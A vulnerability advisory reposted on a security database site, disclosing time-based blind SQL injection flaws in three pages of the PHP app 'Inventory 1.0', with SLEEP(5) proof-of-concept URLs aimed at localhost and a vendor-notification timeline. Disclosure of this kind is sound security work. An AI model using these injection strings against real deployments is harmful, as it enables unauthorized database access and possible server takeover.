Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28692
HistoryOct 29, 2012 - 12:00 a.m.

Inventory 1.0 Multiple SQL Vulnerabilities

2012-10-2900:00:00
vulners.com
18
JSON

Exploit Title: Inventory 1.0 Multiple SQL Vulnerabilities

Date: 10/19/12

Author: G13

Twitter: @g13net

Software Site: https://github.com/farevalod/inventory

Version: 1.0

Category: webapp (php)

dc585

ToC

0x01 Description
0x02 SQL Injection
0x03 Vendor Notification

0x01 Description

PHP + SQL Inventory tracking system

0x02 SQL Injection

The Inventoy application has muliple pages and parameters that are
vulnerable to SQL injection. These vulnerabilities could
be used to extract information from the database or take remote
control of the server.

-----Vulnerable Pages-----

http://localhost/inventory/consulta_fact.php?fact_num=[SQLi]
http://localhost/inventory/addinventario.php?ref=[SQLi]&sn=[SQLi]&factura=[SQLi]
http://localhost/inventory/newtransact.php?ref=[SQLi]

-----PoC Exploits-----

http://localhost/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://localhost/inventory/[email protected]'
AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555-
[email protected]' AND SLEEP(5) AND
'IgkP'='IgkP&[email protected]' AND SLEEP(5) AND
'CFdY'='CFdY
http://localhost/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5)
AND 'wIUB'='wIUB

0x03 Vendor Notification

10/19/12 - Vendor Notified
10/26/12 - No response, disclosure

JSON